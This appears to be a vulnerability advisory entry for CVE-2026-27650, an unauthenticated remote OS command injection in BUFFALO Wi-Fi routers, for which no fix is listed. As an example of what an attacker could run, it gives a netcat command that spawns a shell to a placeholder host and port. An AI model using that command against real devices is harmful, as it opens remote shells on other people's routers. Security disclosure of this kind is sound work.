CVE-2026-27650

Name of the Vulnerable Software and Affected Versions BUFFALO Wi-Fi router products (affected versions not specified)

Description An OS Command Injection issue exists in BUFFALO Wi-Fi router products. Successful exploitation of this issue could allow an attacker to execute arbitrary OS commands on the affected devices. Reports indicate that default configurations are vulnerable and can be compromised. Exploitation involves a vulnerable endpoint allowing remote, unauthenticated OS command injection. An attacker could potentially gain control of the device and execute commands such as nc -e /bin/sh 0.0.0.0 1337.

Recommendations At the moment, there is no information about a newer version that contains a fix for this vulnerability.